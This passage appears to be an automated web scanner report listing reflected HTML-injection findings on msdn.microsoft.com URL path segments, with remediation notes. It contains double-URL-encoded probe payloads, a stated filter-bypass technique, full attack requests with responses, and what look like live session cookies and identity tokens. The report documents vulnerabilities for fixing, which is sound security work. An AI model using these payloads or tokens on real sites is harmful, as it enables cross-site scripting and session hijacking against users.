User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:41 GMT
Content-Length: 9198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85).aspx598c0"><a>64b1072645f" />
...[SNIP]...

2.117. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9acb%2522%253e%253ca%253e41d5fa23755 was submitted in the REST URL parameter 1. This input was echoed as d9acb"><a>41d5fa23755 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd9acb%2522%253e%253ca%253e41d5fa23755/library/ms689718(v=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd9acb"><a>41d5fa23755/library/ms689718(v=vs.85" />
...[SNIP]...

2.118. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f03%2522%253e%253ca%253e6c8979e7095 was submitted in the REST URL parameter 2. This input was echoed as f0f03"><a>6c8979e7095 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryf0f03%2522%253e%253ca%253e6c8979e7095/ms689718(v=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf0f03"><a>6c8979e7095/ms689718(v=vs.85" />
...[SNIP]...

2.119. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2915%2522%253e%253ca%253e82109de73e3 was submitted in the REST URL parameter 3. This input was echoed as a2915"><a>82109de73e3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(va2915%2522%253e%253ca%253e82109de73e3=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(va2915"><a>82109de73e3=vs.85" />
...[SNIP]...

2.120. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5739%2522%253e%253ca%253e5aed2fa913e was submitted in the REST URL parameter 1. This input was echoed as d5739"><a>5aed2fa913e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd5739%2522%253e%253ca%253e5aed2fa913e/library/ms689718(v=vs.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:54 GMT
Content-Length: 9192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd5739"><a>5aed2fa913e/library/ms689718(v=vs.85)" />
...[SNIP]...

2.121. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4104c%2522%253e%253ca%253eafd812d233f was submitted in the REST URL parameter 2. This input was echoed as 4104c"><a>afd812d233f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library4104c%2522%253e%253ca%253eafd812d233f/ms689718(v=vs.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
